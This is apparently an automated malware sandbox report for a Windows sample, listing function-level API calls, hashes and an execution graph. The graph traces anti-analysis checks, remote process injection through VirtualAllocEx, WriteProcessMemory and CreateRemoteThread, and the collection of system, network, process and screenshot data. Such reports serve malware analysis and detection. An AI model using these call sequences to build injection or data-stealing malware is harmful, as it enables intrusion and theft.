                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AdminAtomGlobalUser$AdjustFindPrivilege
                                                                                                                                                                                                                    • String ID: Fri Jun 17 05:52:09 20112$Pn7w$explorer.exe$winlogon.exe
                                                                                                                                                                                                                    • API String ID: 3001685711-3521715275
                                                                                                                                                                                                                    • Opcode ID: d14c921f1184c696d62da8aac8ded89f8ce8efe24655d3e49b352df140887ec9
                                                                                                                                                                                                                    • Instruction ID: 466661b1ea48edbd92509d7abf6a2a5afa49196c9ec5a44dbf6f5976db38d1d5
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d14c921f1184c696d62da8aac8ded89f8ce8efe24655d3e49b352df140887ec9
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6AF08CB460020566EA5077E1AE0AB6B3A1CAB84B90F104137FF00B72E0EAB8DC0046FC
                                                                                                                                                                                                                    Function 00402ED0 Relevance: 13.5, APIs: 9, Instructions: 39memoryCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 00402ED7
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000300,004035BE,7644E610,00402EBE), ref: 00402EEF
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000), ref: 00402EF2
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000300), ref: 00402EFF
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 00402F02
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,004035BE,004035BE,7644E610,00402EBE), ref: 00402F0B
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000), ref: 00402F0E
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,004035BE), ref: 00402F1B
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 00402F1E
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.2153786552.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000000.00000002.2153786552.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_UMwpXhA46R.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Heap$Process$Free$Validate$String
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2629017576-0
                                                                                                                                                                                                                    • Opcode ID: fff050803a28cdbdb81a85633d3b81f0a42b3d859f4e64ff46b7961ccc31fb95
                                                                                                                                                                                                                    • Instruction ID: 47c24e4de567f4ebe007c7ce519db5101e5d5be497eca443f574c4ff2f4d9865
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fff050803a28cdbdb81a85633d3b81f0a42b3d859f4e64ff46b7961ccc31fb95
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8BF0DAB1656211ABEA102BA59E8CF572A6CEF85B82F040525B708F71D0CAB4DC40D67C
                                                                                                                                                                                                                    Function 004014B0 Relevance: 10.6, APIs: 7, Instructions: 72processCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 004014D4
                                                                                                                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?,76D6DB30), ref: 004014DF
                                                                                                                                                                                                                    • Process32First.KERNEL32 ref: 00401505
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,?), ref: 00401520
                                                                                                                                                                                                                    • Process32Next.KERNEL32(00000000,?), ref: 0040152C
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,00000000), ref: 00401548
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0040155A
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.2153786552.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000000.00000002.2153786552.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_UMwpXhA46R.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: HandleProcess32$CloseCreateFirstInformationNextSnapshotToolhelp32memset
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3955875343-0
                                                                                                                                                                                                                    • Opcode ID: 7873ba4b88183a8641433f701d7857d9c97be643caff6c6a3dfa6b6ea5f2b523
                                                                                                                                                                                                                    • Instruction ID: 35ff206d6e877699644ac5607af1a2cdaefe1b2aeb9dd15ae369335d4f3073ea
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7873ba4b88183a8641433f701d7857d9c97be643caff6c6a3dfa6b6ea5f2b523
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1D11C3B25042146BD310DF65DC0899BBBACEBD53A0F00453AFE55A72D0E33499088BEA
                                                                                                                                                                                                                    Function 00401330 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 48libraryloaderCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 0040135A
                                                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(ntdll.dll,?,00402A8E,-00000006,00000000), ref: 00401367
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 00401373
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.2153786552.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000000.00000002.2153786552.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_UMwpXhA46R.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AddressCountHandleModuleProcTick
                                                                                                                                                                                                                    • String ID: RtlUniform$ntdll.dll
                                                                                                                                                                                                                    • API String ID: 1545651562-3277137149
                                                                                                                                                                                                                    • Opcode ID: d14c2f9e698ac929ed0932fb87d06ba4f74ade3cc07b29cd2c75e337da446871
                                                                                                                                                                                                                    • Instruction ID: 796e466c09054be0152a46d456eb4211c9760dde1472f6724dae78271da73244
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d14c2f9e698ac929ed0932fb87d06ba4f74ade3cc07b29cd2c75e337da446871
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E80126712003045BC314AB6AAC81696B7DEAB84706341413BEE05F36A2C23AD8048BAC
                                                                                                                                                                                                                    Function 004012A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 23libraryloaderCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 004012AB
                                                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(ntdll.dll,?,00402A82,00000000), ref: 004012BC
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 004012CC
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.2153786552.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000000.00000002.2153786552.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_UMwpXhA46R.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AddressCountHandleModuleProcTick
                                                                                                                                                                                                                    • String ID: RtlUniform$ntdll.dll
                                                                                                                                                                                                                    • API String ID: 1545651562-3277137149
                                                                                                                                                                                                                    • Opcode ID: eae13d97ce2cff1767e69285929d2bc7f9bbc3e812787a57d7dc8512338ae20e
                                                                                                                                                                                                                    • Instruction ID: b56d10f3903839679d055e287fe873ff32dc311f96dddc7098b711b9a384a0cf
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: eae13d97ce2cff1767e69285929d2bc7f9bbc3e812787a57d7dc8512338ae20e
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 65E04FB07413045BD714BFB6AD09A1637DD9BC47073968036BB09F21E1DA39C814CA6D

                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                    Execution Coverage:2.3%
                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:65%
                                                                                                                                                                                                                    Signature Coverage:26.2%
                                                                                                                                                                                                                    Total number of Nodes:446
                                                                                                                                                                                                                    Total number of Limit Nodes:16
                                                                                                                                                                                                                    execution_graph 80791 402c10 LoadLibraryA GetModuleFileNameA 80863 403900 RegOpenKeyExA 80791->80863 80794 402c44 ExitProcess 80795 402c4c 80877 4020b0 CreateFileA 80795->80877 80800 402c81 80888 402240 CreateFileA 80800->80888 80801 402c69 GetTickCount PostMessageA 80801->80800 80810 402ca1 80953 401d80 40 API calls 80810->80953 80811 402cc3 IsUserAnAdmin GetModuleHandleA 80813 402cfc 80811->80813 80814 402cdd GetProcAddress 80811->80814 80817 402d02 80813->80817 80818 402d4e 80813->80818 80814->80813 80816 402cef GetCurrentProcess 80814->80816 80815 402ca6 80821 402cb2 80815->80821 80822 402caa ExitProcess 80815->80822 80816->80813 80819 402d06 StrStrIA 80817->80819 80820 402d1c 80817->80820 80823 402d56 StrStrIA 80818->80823 80824 402ddd 80818->80824 80819->80820 80825 402d3f 80819->80825 80914 402810 RegCreateKeyExA 80820->80914 80954 403440 70 API calls 80821->80954 80829 402d81 80823->80829 80830 402d6c 80823->80830 80827 402810 9 API calls 80824->80827 80955 402950 93 API calls 80825->80955 80833 402de8 GlobalFindAtomA 80827->80833 80958 402950 93 API calls 80829->80958 80836 402810 9 API calls 80830->80836 80839 402e38 ExitProcess 80833->80839 80840 402df8 GlobalAddAtomA IsUserAnAdmin 80833->80840 80835 402cb7 80835->80811 80842 402cbb ExitProcess 80835->80842 80843 402d77 80836->80843 80838 402d86 GlobalFindAtomA 80846 402dd6 80838->80846 80847 402d96 GlobalAddAtomA IsUserAnAdmin 80838->80847 80848 402e19 IsUserAnAdmin 80840->80848 80849 402e09 80840->80849 80841 402d44 80956 4011c0 9 API calls 80841->80956 80957 4027b0 43 API calls 80843->80957 80960 4011c0 9 API calls 80846->80960 80853 402db7 IsUserAnAdmin 80847->80853 80854 402da7 80847->80854 80855 402e24 80848->80855 80849->80848 80852 402d49 80852->80839 80856 402dc2 80853->80856 80854->80853 80961 4014b0 7 API calls 80855->80961 80959 4014b0 7 API calls 80856->80959 80859 402e2f 80859->80839 80861 401580 32 API calls 80859->80861 80860 402dcd 80860->80846 80862 401580 32 API calls 80860->80862 80861->80839 80862->80846 80864 40394a RegQueryValueExA 80863->80864 80865 4039ad GetUserNameA CharUpperA strstr 80863->80865 80868 40397b RegCloseKey 80864->80868 80869 40396f RegCloseKey 80864->80869 80866 402c40 80865->80866 80867 4039eb strstr 80865->80867 80866->80794 80866->80795 80867->80866 80870 403a04 strstr 80867->80870 80868->80865 80871 40398e 80868->80871 80869->80865 80870->80866 80872 403a1d GetSystemWindowsDirectoryA GetVolumeInformationA 80870->80872 80871->80865 80871->80866 80872->80866 80873 403a5d 80872->80873 80873->80866 80874 403a79 GetModuleFileNameA StrStrIA 80873->80874 80874->80866 80875 403aa5 StrStrIA 80874->80875 80875->80866 80876 403ab7 StrStrIA 80875->80876 80876->80866 80878 402230 80877->80878 80879 402200 DeviceIoControl CloseHandle 80877->80879 80880 401fc0 memset SHGetFolderPathA 80878->80880 80879->80878 80881 402087 80880->80881 80882 40201e PathAppendA SetCurrentDirectoryA 80880->80882 80883 402092 FindWindowA 80881->80883 80884 40208b FreeLibrary 80881->80884 80882->80881 80885 402041 LoadLibraryA 80882->80885 80883->80800 80883->80801 80884->80883 80885->80881 80886 402055 GetProcAddress 80885->80886 80886->80881 80887 402065 80886->80887 80887->80881 80889 4022e3 WriteFile GetSystemTimeAsFileTime WriteFile CloseHandle 80888->80889 80890 402324 80888->80890 80889->80890 80891 402330 SHGetFolderPathA 80890->80891 80892 402415 80891->80892 80893 402357 80891->80893 80895 402420 SHGetFolderPathA 80892->80895 80893->80893 80894 4023cc MoveFileA 80893->80894 80894->80892 80896 40254f 80895->80896 80897 40244b CreateFileA 80895->80897 80900 402560 CoInitializeEx 80896->80900 80897->80896 80899 4024b1 11 API calls 80897->80899 80899->80896 80901 40258e 80900->80901 80902 40259f GetModuleFileNameW SysAllocString 80900->80902 80901->80902 80904 4027a4 IsUserAnAdmin 80901->80904 80903 4025cd SysAllocString 80902->80903 80908 402746 80902->80908 80905 402733 SysFreeString 80903->80905 80906 4025de CoCreateInstance 80903->80906 80904->80810 80904->80811 80907 402743 SysFreeString 80905->80907 80905->80908 80910 402605 80906->80910 80912 402707 80906->80912 80907->80908 80908->80904 80909 40279e CoUninitialize 80908->80909 80909->80904 80910->80905 80911 402693 CoCreateInstance 80910->80911 80910->80912 80913 4026b5 80911->80913 80912->80905 80913->80912 80915 402855 GetEnvironmentVariableA PathAddBackslashA GetVolumeInformationA _snprintf 80914->80915 80916 4028dd RegCreateKeyExA 80914->80916 80918 4028c0 80915->80918 80917 402924 80916->80917 80916->80918 80919 40292c RegFlushKey RegCloseKey 80917->80919 80920 40293d GetCurrentProcessId 80917->80920 80918->80918 80921 40291e RegSetValueExA 80918->80921 80919->80920 80922 401580 80920->80922 80921->80917 80923 4017e3 Sleep 80922->80923 80925 401596 80922->80925 80923->80839 80926 4015b5 80925->80926 80927 4015ab Sleep 80925->80927 80962 401c70 memset CreateToolhelp32Snapshot 80925->80962 80928 401c70 11 API calls 80926->80928 80927->80925 80927->80926 80929 4015bc 80928->80929 80929->80923 80930 4015c4 OpenProcess 80929->80930 80930->80923 80931 4015df GetModuleHandleA 80930->80931 80932 401616 80931->80932 80933 4015fb GetProcAddress 80931->80933 80935 40161c GetModuleHandleA 80932->80935 80936 40164f VirtualAllocEx 80932->80936 80933->80932 80934 401609 GetCurrentProcess 80933->80934 80934->80932 80937 401632 GetProcAddress 80935->80937 80940 40163e 80935->80940 80938 4017c0 GetHandleInformation 80936->80938 80939 401692 WriteProcessMemory 80936->80939 80937->80940 80938->80923 80941 4017d6 80938->80941 80942 4016be 80939->80942 80943 40172f WriteProcessMemory FlushInstructionCache CreateRemoteThread 80939->80943 80940->80936 80940->80938 80941->80923 80946 4017dc CloseHandle 80941->80946 80947 4016c1 VirtualAlloc 80942->80947 80951 401729 80942->80951 80944 401772 GetHandleInformation 80943->80944 80945 40179e RtlCreateUserThread 80943->80945 80948 401795 80944->80948 80949 401788 80944->80949 80945->80938 80946->80923 80947->80942 80950 4016d9 memcpy WriteProcessMemory VirtualFree 80947->80950 80948->80938 80949->80948 80952 40178e CloseHandle 80949->80952 80950->80942 80951->80943 80952->80948 80953->80815 80954->80835 80955->80841 80956->80852 80957->80852 80958->80838 80959->80860 80960->80852 80961->80859 80963 401cb0 GetLastError 80962->80963 80964 401d08 Module32First 80962->80964 80965 401d6b 80963->80965 80966 401cbf SwitchToThread CreateToolhelp32Snapshot 80963->80966 80967 401d24 80964->80967 80973 401cd5 80964->80973 80965->80925 80966->80965 80966->80973 80968 401d30 StrStrIA 80967->80968 80971 401d42 StrStrIA 80968->80971 80972 401d4e Module32Next 80968->80972 80969 401ce3 GetHandleInformation 80970 401cff 80969->80970 80974 401cf2 80969->80974 80970->80925 80971->80972 80971->80973 80972->80968 80972->80973 80973->80969 80973->80970 80974->80970 80975 401cf8 CloseHandle 80974->80975 80975->80970 80976 2c73940 80977 2c73fd8 80976->80977 80981 2c73965 80976->80981 80978 2c73a6e 80978->80977 81037 2c73750 RegOpenKeyExA 80978->81037 80979 2c739ca VirtualQuery 80980 2c739f5 VirtualQuery VirtualQuery 80979->80980 80979->80981 80980->80981 80981->80977 80981->80978 80981->80979 80986 2c73ab2 SymSetOptions GetCurrentProcess SymInitialize 80987 2c73ad4 GetCurrentProcess 80986->80987 80989 2c73b0e 80986->80989 81048 2c73830 80987->81048 80989->80989 81057 2c93910 VirtualQuery 80989->81057 80991 2c73b34 81058 2c93910 VirtualQuery 80991->81058 80993 2c73b44 GetLastError _snprintf 81059 2c93910 VirtualQuery 80993->81059 80995 2c73bbc 81004 2c73bd8 80995->81004 81138 2c93910 VirtualQuery 80995->81138 80997 2c73c38 GetCurrentThread ZwQueryInformationThread 80999 2c73c55 GetCurrentProcess 80997->80999 81002 2c73c95 80997->81002 80998 2c73bcc 81139 2c93910 VirtualQuery 80998->81139 81003 2c73830 6 API calls 80999->81003 81006 2c73d13 81002->81006 81007 2c73cf8 GetCurrentProcess 81002->81007 81003->81002 81004->80997 81004->81002 81004->81004 81005 2c73fc7 VirtualFree 81005->80977 81006->81005 81009 2c73d42 PathAddBackslashA 81006->81009 81008 2c73830 6 API calls 81007->81008 81008->81002 81010 2c73d56 81009->81010 81010->81010 81011 2c73d70 PathAddBackslashA 81010->81011 81060 2c73090 81011->81060 81017 2c73dc0 81017->81017 81018 2c73dd8 GetDateFormatA GetTimeFormatA _snprintf 81017->81018 81019 2c73e56 PathAddBackslashA 81018->81019 81021 2c73ea0 81019->81021 81070 2c74920 CreateFileA 81021->81070 81025 2c73f20 81112 2c93950 GetDesktopWindow GetWindowDC 81025->81112 81027 2c73f75 81140 2c764b0 CreateFileA 81027->81140 81029 2c73f80 81029->81005 81141 2c766a0 WriteFile 81029->81141 81031 2c73fa1 81142 2c93e00 GetHandleInformation CloseHandle 81031->81142 81033 2c73fa6 PathAddBackslashA 81143 2c825c0 333 API calls 81033->81143 81035 2c73fbc 81144 2c76a10 SetFileAttributesA DeleteFileA 81035->81144 81038 2c7378e RegQueryValueExA 81037->81038 81039 2c737ab 81037->81039 81038->81039 81040 2c737b2 RegCloseKey 81039->81040 81041 2c737b9 81039->81041 81040->81041 81041->80977 81042 2c737c0 RegOpenKeyExA 81041->81042 81043 2c73810 81042->81043 81044 2c737ea RegSetValueExA 81042->81044 81046 2c73817 RegCloseKey 81043->81046 81047 2c7381e VirtualAlloc 81043->81047 81044->81043 81045 2c73806 RegFlushKey 81044->81045 81045->81043 81046->81047 81047->80977 81047->80986 81050 2c73844 81048->81050 81049 2c7392a 81049->80989 81050->81049 81051 2c73869 SymGetModuleBase 81050->81051 81052 2c73893 SymGetModuleInfo 81051->81052 81053 2c73912 _snprintf 81051->81053 81052->81053 81054 2c738a6 SymGetSymFromAddr 81052->81054 81053->81049 81055 2c738c0 _snprintf 81054->81055 81056 2c738ee _snprintf 81054->81056 81055->80989 81056->80989 81057->80991 81058->80993 81059->80995 81061 2c730a0 81060->81061 81145 2c766d0 81061->81145 81064 2c769d0 81065 2c769d4 CreateDirectoryA 81064->81065 81066 2c73d9a PathAddBackslashA 81064->81066 81065->81066 81067 2c769e1 GetLastError IsUserAnAdmin 81065->81067 81066->81017 81068 2c769f4 PathMakeSystemFolderA 81067->81068 81069 2c769fb SetLastError 81067->81069 81068->81069 81069->81066 81071 2c73efd PathAddBackslashA 81070->81071 81072 2c74a5f WriteFile WriteFile WriteFile GetModuleFileNameA WriteFile 81070->81072 81071->81025 81073 2c74ad0 81072->81073 81073->81073 81074 2c74ad7 WriteFile WriteFile GetUserNameA WriteFile 81073->81074 81075 2c74b30 81074->81075 81075->81075 81076 2c74b37 WriteFile WriteFile GetEnvironmentVariableA WriteFile 81075->81076 81077 2c74b90 81076->81077 81077->81077 81078 2c74b97 WriteFile WriteFile GetSystemDefaultLangID memset 81077->81078 81080 2c74be1 WriteFile 81078->81080 81081 2c74c50 81080->81081 81081->81081 81082 2c74c57 8 API calls 81081->81082 81083 2c74cd5 81082->81083 81083->81083 81084 2c74cdc WriteFile WriteFile GetDateFormatA WriteFile 81083->81084 81085 2c74d40 81084->81085 81085->81085 81086 2c74d47 WriteFile WriteFile GetTimeFormatA WriteFile 81085->81086 81087 2c74da7 81086->81087 81087->81087 81088 2c74dae WriteFile WriteFile GetTimeZoneInformation _snprintf WriteFile 81087->81088 81089 2c74e61 81088->81089 81089->81089 81090 2c74e68 WriteFile WriteFile WriteFile 81089->81090 81166 2c74070 GetTickCount _snprintf 81090->81166 81092 2c74ea6 81167 2c74070 GetTickCount _snprintf 81092->81167 81094 2c74ec1 WriteFile WriteFile GetSystemWindowsDirectoryA WriteFile 81095 2c74f10 81094->81095 81095->81095 81096 2c74f17 WriteFile WriteFile WriteFile IsUserAnAdmin 81095->81096 81097 2c74f5f IsUserAnAdmin 81096->81097 81099 2c74f87 WriteFile WriteFile 81097->81099 81100 2c74f82 81097->81100 81168 2c747e0 RegOpenKeyExA 81099->81168 81100->81099 81104 2c74fb4 81210 2c743e0 memset CreateToolhelp32Snapshot 81104->81210 81106 2c74fba 81227 2c74630 81106->81227 81108 2c74fc0 81108->81071 81109 2c74fc8 GetHandleInformation 81108->81109 81109->81071 81110 2c74fd7 81109->81110 81110->81071 81111 2c74fdd CloseHandle 81110->81111 81111->81071 81113 2c93978 CreateCompatibleDC 81112->81113 81114 2c93971 81112->81114 81115 2c9398e 7 API calls 81113->81115 81116 2c93986 81113->81116 81114->81027 81117 2c93a1f GetProcessHeap HeapAlloc 81115->81117 81118 2c93a8e 81115->81118 81116->81027 81117->81118 81119 2c93a39 memset GetDIBits 81117->81119 81118->81027 81241 2c82ce0 GetProcessHeap HeapAlloc memset 81119->81241 81121 2c93a80 81122 2c93a99 GetDIBits 81121->81122 81123 2c93a87 81121->81123 81243 2c764b0 CreateFileA 81122->81243 81242 2c82d20 GetProcessHeap HeapValidate GetProcessHeap HeapFree 81123->81242 81126 2c93ad1 81127 2c93ad8 WriteFile 81126->81127 81128 2c93b11 81126->81128 81244 2c766a0 WriteFile 81127->81244 81247 2c82d20 GetProcessHeap HeapValidate GetProcessHeap HeapFree 81128->81247 81131 2c93aff 81245 2c766a0 WriteFile 81131->81245 81132 2c93b22 81248 2c82d20 GetProcessHeap HeapValidate GetProcessHeap HeapFree 81132->81248 81135 2c93b0a 81246 2c93e00 GetHandleInformation CloseHandle 81135->81246 81136 2c93b2a ReleaseDC 81136->81027 81138->80998 81139->81004 81140->81029 81141->81031 81142->81033 81143->81035 81144->81005 81146 2c730eb 81145->81146 81147 2c766ea 81145->81147 81146->81064 81147->81146 81148 2c76702 GetProcessHeap HeapAlloc 81147->81148 81148->81146 81149 2c76726 memset lstrcpynA 81148->81149 81150 2c76742 81149->81150 81150->81150 81151 2c7674a FindFirstFileA 81150->81151 81151->81146 81156 2c76776 81151->81156 81152 2c768f7 FindNextFileA 81153 2c7690b FindClose 81152->81153 81152->81156 81165 2c82d20 GetProcessHeap HeapValidate GetProcessHeap HeapFree 81153->81165 81155 2c76917 SetFileAttributesA RemoveDirectoryA 81155->81146 81156->81146 81156->81152 81157 2c76825 GetProcessHeap HeapAlloc 81156->81157 81157->81146 81158 2c76845 memset lstrcpynA PathAddBackslashA 81157->81158 81163 2c76870 81158->81163 81159 2c768a5 SetFileAttributesA SetFileAttributesA DeleteFileA 81160 2c768c0 MoveFileExA 81159->81160 81161 2c768ca GetProcessHeap HeapValidate 81159->81161 81160->81161 81161->81163 81164 2c768e0 GetProcessHeap HeapFree 81161->81164 81162 2c766d0 4 API calls 81162->81163 81163->81152 81163->81159 81163->81161 81163->81162 81164->81163 81165->81155 81166->81092 81167->81094 81169 2c74913 81168->81169 81170 2c74811 _snprintf 81168->81170 81178 2c740f0 GetProcessHeap HeapAlloc 81169->81178 81171 2c7483c 81170->81171 81172 2c74909 RegCloseKey 81170->81172 81173 2c74843 RegQueryValueExA 81171->81173 81175 2c74875 WriteFile 81171->81175 81176 2c7488e WriteFile 81171->81176 81177 2c748b7 WriteFile WriteFile _snprintf 81171->81177 81172->81169 81173->81171 81174 2c74908 81173->81174 81174->81172 81175->81176 81176->81171 81177->81173 81177->81174 81179 2c7412c 81178->81179 81180 2c7411c memset 81178->81180 81181 2c743c4 81179->81181 81182 2c7418d GetTcpTable 81179->81182 81180->81179 81181->81104 81183 2c74200 81182->81183 81184 2c7419f GetProcessHeap HeapValidate 81182->81184 81187 2c74204 GetProcessHeap HeapValidate 81183->81187 81188 2c7422d 81183->81188 81185 2c741af GetProcessHeap HeapFree 81184->81185 81186 2c741bb 81184->81186 81185->81186 81189 2c741c4 GetProcessHeap HeapAlloc 81186->81189 81190 2c741e8 81186->81190 81187->81181 81191 2c74218 GetProcessHeap HeapFree 81187->81191 81192 2c74240 GetProcessHeap HeapAlloc 81188->81192 81197 2c743cd 81188->81197 81189->81190 81193 2c741dc memset 81189->81193 81190->81181 81194 2c741f3 GetTcpTable 81190->81194 81191->81104 81196 2c7425f memset 81192->81196 81192->81197 81193->81190 81194->81183 81199 2c74274 81196->81199 81240 2c82d20 GetProcessHeap HeapValidate GetProcessHeap HeapFree 81197->81240 81198 2c743d7 81198->81104 81199->81199 81200 2c74363 81199->81200 81205 2c74291 81199->81205 81200->81200 81201 2c7438d WriteFile GetProcessHeap HeapValidate 81200->81201 81201->81181 81202 2c743b8 GetProcessHeap HeapFree 81201->81202 81202->81181 81203 2c74000 GetProcessHeap HeapAlloc _snprintf 81203->81205 81204 2c74360 81204->81200 81205->81203 81205->81204 81206 2c7432f GetProcessHeap HeapValidate 81205->81206 81208 2c742c7 htons htons _snprintf GetProcessHeap HeapValidate 81205->81208 81206->81205 81207 2c7433f GetProcessHeap HeapFree 81206->81207 81207->81205 81208->81205 81209 2c74320 GetProcessHeap HeapFree 81208->81209 81209->81205 81211 2c74433 Process32First 81210->81211 81217 2c74606 81210->81217 81212 2c74486 81211->81212 81213 2c7444b 81211->81213 81216 2c744a7 GetProcessHeap HeapAlloc 81212->81216 81212->81217 81214 2c74457 GetHandleInformation 81213->81214 81213->81217 81215 2c7446b 81214->81215 81214->81217 81215->81217 81218 2c74476 CloseHandle 81215->81218 81216->81217 81219 2c744c7 memset 81216->81219 81217->81106 81218->81106 81222 2c744e0 81219->81222 81220 2c744f0 OpenProcess 81221 2c74506 GetModuleFileNameExA 81220->81221 81220->81222 81221->81222 81222->81220 81223 2c74567 _snprintf Process32Next 81222->81223 81223->81220 81224 2c74599 81223->81224 81224->81224 81225 2c745c7 WriteFile GetProcessHeap HeapValidate 81224->81225 81225->81217 81226 2c745fa GetProcessHeap HeapFree 81225->81226 81226->81217 81228 2c74660 NetQueryDisplayInformation 81227->81228 81237 2c74684 81228->81237 81229 2c7476a 81229->81229 81230 2c74777 WriteFile 81229->81230 81232 2c74796 GetProcessHeap HeapValidate 81230->81232 81233 2c747b8 81230->81233 81231 2c746b1 GetProcessHeap HeapAlloc 81234 2c746d0 memset 81231->81234 81231->81237 81232->81233 81236 2c747ac GetProcessHeap HeapFree 81232->81236 81233->81108 81234->81237 81235 2c747c1 NetApiBufferFree 81235->81108 81236->81233 81237->81229 81237->81231 81237->81235 81238 2c7470f _snprintf 81237->81238 81239 2c7473d NetApiBufferFree 81237->81239 81238->81237 81239->81228 81239->81229 81240->81198 81241->81121 81242->81118 81243->81126 81244->81131 81245->81135 81246->81128 81247->81132 81248->81136 81249 2c76a30 NtQuerySystemInformation 81250 2c76a5f GetCurrentProcessId 81249->81250 81255 2c76b39 81249->81255 81258 2c92e00 OpenProcess 81250->81258 81253 2c76a6e GetCurrentThreadId GetThreadDesktop GetUserObjectInformationA 81254 2c76a98 lstrcmpiA 81253->81254 81257 2c76ab2 81253->81257 81254->81255 81254->81257 81256 2c76ad0 memset _snprintf OpenMutexA 81256->81257 81257->81255 81257->81256 81259 2c76a6a 81258->81259 81260 2c92e25 OpenProcessToken 81258->81260 81259->81253 81259->81257 81261 2c92e3a GetTokenInformation 81260->81261 81262 2c92ed2 GetHandleInformation 81260->81262 81264 2c92e54 CharUpperA 81261->81264 81270 2c92e82 81261->81270 81262->81259 81263 2c92ee8 81262->81263 81263->81259 81266 2c92eee CloseHandle 81263->81266 81267 2c92e70 81264->81267 81265 2c92eb6 GetHandleInformation 81265->81262 81268 2c92ec5 81265->81268 81266->81259 81269 2c92e84 CharUpperA 81267->81269 81267->81270 81268->81262 81271 2c92ecb CloseHandle 81268->81271 81269->81270 81270->81262 81270->81265 81271->81262 81272 29a1360 81314 29a11d0 81272->81314 81274 29a136f GetPEB 81275 29a1090 GetPEB 81274->81275 81276 29a1394 81275->81276 81277 29a1000 GetPEB 81276->81277 81278 29a13a0 81277->81278 81279 29a1090 GetPEB 81278->81279 81280 29a13a6 81279->81280 81281 29a1619 81280->81281 81282 29a13bc GetPEB 81280->81282 81283 29a1000 GetPEB 81281->81283 81284 29a1090 GetPEB 81282->81284 81285 29a1625 81283->81285 81288 29a13d8 81284->81288 81286 29a1090 GetPEB 81285->81286 81287 29a162b 81286->81287 81288->81281 81289 29a1000 GetPEB 81288->81289 81290 29a141b 81289->81290 81291 29a1090 GetPEB 81290->81291 81292 29a1421 81291->81292 81293 29a1000 GetPEB 81292->81293 81294 29a1441 81293->81294 81295 29a1090 GetPEB 81294->81295 81296 29a1447 